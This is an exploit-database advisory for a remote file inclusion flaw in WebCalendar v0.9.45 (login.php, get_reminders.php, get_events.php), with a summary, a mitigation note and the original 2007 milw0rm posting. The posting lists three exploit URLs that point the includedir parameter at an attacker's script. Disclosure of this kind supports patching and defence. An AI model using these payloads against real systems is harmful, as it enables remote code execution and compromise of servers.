WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

vendor:

WebCalendar

by:

Drackanz

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: WebCalendar

Affected Version From: WebCalendar v0.9.45 (13 Dec 2004)

Affected Version To: WebCalendar v0.9.45 (13 Dec 2004)

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

The WebCalendar v0.9.45 (13 Dec 2004) is vulnerable to remote file inclusion in the login.php, get_reminders.php, and get_events.php scripts. An attacker can include an arbitrary file by manipulating the includedir parameter in the URLs provided. This can lead to remote code execution and compromise of the affected system.

Mitigation:

Apply the latest patches and updates for the WebCalendar software. Additionally, ensure that user input is properly validated and sanitized to prevent arbitrary file inclusion vulnerabilities.

Source

Exploit-DB raw data:

|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Authord : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64, |
| exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX; |
| |
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------

# milw0rm.com [2007-03-15]